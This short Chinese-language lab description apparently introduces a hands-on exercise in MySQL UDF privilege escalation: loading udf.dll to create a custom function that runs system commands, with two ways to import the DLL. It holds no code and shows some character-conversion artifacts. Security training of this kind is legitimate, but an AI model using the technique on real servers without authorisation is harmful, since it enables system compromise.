udf通過添加新函數(shù),對MySQL的功能進(jìn)行擴(kuò)充,使用UDF提權(quán)原理就是通過引入udf.dll,引入自定義函數(shù),執(zhí)行系統(tǒng)命令。通過實(shí)驗(yàn)學(xué)習(xí)真實(shí)滲透場景中的MySQL udf提權(quán)方法,掌握兩種dll文件導(dǎo)入方式,通過udf提權(quán)執(zhí)行系統(tǒng)命令。